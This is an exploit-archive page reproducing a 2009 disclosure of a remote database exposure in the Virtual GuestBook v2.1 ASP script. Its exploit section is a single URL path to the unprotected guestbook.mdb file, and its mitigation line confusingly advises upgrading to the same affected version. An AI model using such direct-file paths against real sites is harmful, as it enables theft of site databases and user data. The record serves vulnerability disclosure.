header-logo
Suggest Exploit
vendor:
Virtual GuestBook
by:
Moudi
7.5
CVSS
HIGH
Remote Database Disclosure
N/A
CWE
Product Name: Virtual GuestBook
Affected Version From: Virtual GuestBook v2.1
Affected Version To: Virtual GuestBook v2.1
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Virtual GuestBook v2.1 Remote Database Disclosure Vulnerability

A vulnerability exists in Virtual GuestBook v2.1 which allows an attacker to remotely disclose the database. By sending a request to http://localhost/[path]/database/guestbook.mdb, an attacker can gain access to the database.

Mitigation:

Upgrade to the latest version of Virtual GuestBook v2.1
Source

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================

==============================================================================
    Virtual GuestBook v2.1 Remote Database Disclosure Vulnerability
==============================================================================

	[»] Script:             [ Virtual GuestBook v2.1  ]
	[»] Language:           [ ASP ]
	[»] Website:            [ http://www.minitdesign.com/vgbook.asp ]
	[»] Founder:            [ Moudi <m0udi@9.cn> ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , and all hackers... ]
        [»] Team:               [ EvilWay ]

###########################################################################

===[ Exploit ]===	
	
	[»] http://localhost/[path]/database/guestbook.mdb


Author: Moudi

###########################################################################

# milw0rm.com [2009-01-13]

Navigation

Suggest Exploit

Services By CQR